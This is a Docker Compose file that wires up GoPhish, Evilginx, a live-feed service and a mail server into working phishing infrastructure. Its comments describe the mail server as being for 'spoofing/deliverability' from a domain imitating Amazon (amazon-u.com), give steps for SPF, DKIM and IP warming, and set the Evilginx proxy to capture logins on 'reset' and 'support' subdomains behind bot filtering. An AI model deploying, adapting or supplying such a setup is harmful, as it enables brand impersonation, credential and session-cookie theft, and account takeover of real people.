# docker-compose.yml
# Enhanced Docker Compose for evilgophish with integrated mailserver for SMTP.
# New Service: mailserver (docker-mailserver) for long-term email sending/relay.
# Why: Custom SMTP for spoofing/deliverability; integrates with GoPhish for campaigns.
# How: GoPhish uses mailserver:587 with auth; Evilginx indirect (via GoPhish emails).
# Volumes: Added maildata (mails/DB), mailstate (queue/state), maillogs, config (custom cfgs).
# Ports: SMTP 25/465/587 exposed; IMAP/POP optional (commented).
# Best Practices:
# - DNS: Point MX to host IP; add SPF TXT "v=spf1 ip4:YOUR_IP include:_spf.yourdomain ~all".
# - DKIM: Post-setup, run docker exec mailserver setup dkim; add TXT to DNS.
# - Security: Use strong pass; firewall ports (ufw allow 25,465,587 from trusted).
# - Deliverability: Warm IP; monitor logs for bounces/spam.
# - Integration: Set GoPhish SMTP to mailserver:587, user support@amazon-u.com.
# - Long-term: Persistent volumes; backup maildata; rotate DKIM yearly.
# Tips: Test sending with docker exec mailserver swaks --to test@gmail.com --from support@amazon-u.com --server localhost:587 -au support@amazon-u.com -ap PASS.

version: '3.8'

services:
  nginx:
    image: nginx:alpine
    ports:
      - "80:80"
      - "443:443"
    volumes:
      - ./nginx.conf:/etc/nginx/nginx.conf:ro
      - ssl:/etc/nginx/ssl:ro
      - logs:/var/log/nginx
    depends_on:
      - evilginx
      - gophish
    restart: unless-stopped
    networks:
      - evilnet
    logging:
      driver: "json-file"
      options:
        max-size: "10m"
        max-file: "3"

  gophish:
    build:
      context: .
      dockerfile: Dockerfile.gophish
    ports:
      - "127.0.0.1:3333:3333"
    volumes:
      - gophish_data:/app/data
      - ./gophish/config.json:/app/config.json:ro
      - uploads:/app/uploads
      - logs:/app/logs
    environment:
      - GOPHISH_DB_PATH=/app/data/gophish.db
      - SMTP_HOST=${SMTP_HOST:-mailserver}  # Now defaults to internal mailserver
      - SMTP_PORT=${SMTP_PORT:-587}
      - SMTP_USER=${SMTP_USER:-support@amazon-u.com}
      - SMTP_PASS=${SMTP_PASS}
      - TWILIO_ACCOUNT_SID=${TWILIO_ACCOUNT_SID}
      - TWILIO_AUTH_TOKEN=${TWILIO_AUTH_TOKEN}
      - TWILIO_PHONE=${TWILIO_PHONE}
    command: ./gophish --admin ./config.json
    depends_on:
      - evilfeed
      - mailserver  # Depend on mail for SMTP
    restart: unless-stopped
    networks:
      - evilnet
    healthcheck:
      test: ["CMD", "wget", "--spider", "http://localhost:3333"]
      interval: 30s
      timeout: 10s
      retries: 3

  evilginx:
    build:
      context: .
      dockerfile: Dockerfile.evilginx
    volumes:
      - evilginx_data:/app
      - /etc/resolv.conf:/etc/resolv.conf:ro
      - uploads:/app/uploads:ro
      - logs:/app/logs
    environment:
      - DOMAIN=${DOMAIN:-amazon-u.com}
      - SUBDOMAINS=${SUBDOMAINS:-support,email,reset,admin}
      - PROXY_ROOT=${PROXY_ROOT:-true}
      - RID_REPLACEMENT=${RID_REPLACEMENT:-user_id}
      - TURNSTILE_PUBLIC=${TURNSTILE_PUBLIC}
      - TURNSTILE_PRIVATE=${TURNSTILE_PRIVATE}
      - GOPHISH_DB=/app/data/gophish.db
      - FEED_ENABLED=${FEED_ENABLED:-true}
    command: >
      sh -c "
        evilginx -g /app/data/gophish.db
        -turnstile $${TURNSTILE_PUBLIC:-none}:$${TURNSTILE_PRIVATE:-none}
        $${FEED_ENABLED:+ -feed}
      "
    depends_on:
      - gophish
      - evilfeed
    restart: unless-stopped
    cap_add:
      - NET_ADMIN
    networks:
      - evilnet
    healthcheck:
      test: ["CMD", "pgrep", "evilginx"]
      interval: 30s
      timeout: 10s
      retries: 3

  evilfeed:
    build:
      context: .
      dockerfile: Dockerfile.evilfeed
    ports:
      - "127.0.0.1:1337:1337"
    volumes:
      - evilfeed_data:/app/data
      - gophish_data:/app/gophish_data:ro
      - logs:/app/logs
    environment:
      - GOPHISH_DB=/app/gophish_data/gophish.db
      - WEBSOCKET_PORT=1337
    command: ./evilfeed
    restart: unless-stopped
    networks:
      - evilnet
    healthcheck:
      test: ["CMD", "wget", "--spider", "http://localhost:1337"]
      interval: 30s
      timeout: 10s
      retries: 3

  mailserver:
    image: ghcr.io/docker-mailserver/docker-mailserver:latest
    hostname: mail.${DOMAIN:-amazon-u.com}
    ports:
      - "25:25"
      - "465:465"
      - "587:587"
      # - "143:143"  # IMAP if needed
      # - "993:993"  # IMAPS
    volumes:
      - maildata:/var/mail
      - mailstate:/var/mail-state
      - maillogs:/var/log/mail
      - ./mailconfig:/tmp/docker-mailserver/
      - logs:/var/log/supervisor  # Shared logs
    environment:
      - OVERRIDE_HOSTNAME=mail.${DOMAIN:-amazon-u.com}
      - DMS_DMARC_POLICY=quarantine  # Or reject/none
      - DMS_SPF_POLICY=reject
      - PERMIT_DOCKER=network  # Allow from evilnet
      - ENABLE_CLAMAV=1  # Antivirus
      - ENABLE_FAIL2BAN=1  # Security
      - ENABLE_POSTGREY=0  # Optional greylisting
      - SSL_TYPE=snakeoil  # Self-signed; use letsencrypt for prod
    cap_add:
      - NET_ADMIN
      - SYS_PTRACE
    restart: unless-stopped
    networks:
      - evilnet
    healthcheck:
      test: ["CMD", "nc", "-z", "localhost", "25"]
      interval: 30s
      timeout: 10s
      retries: 3

volumes:
  gophish_data:
  evilginx_data:
  evilfeed_data:
  uploads:
  ssl:
  logs:
  maildata:
  mailstate:
  maillogs:
  mailconfig:  # For overrides like postfix.cf

networks:
  evilnet:
    driver: bridge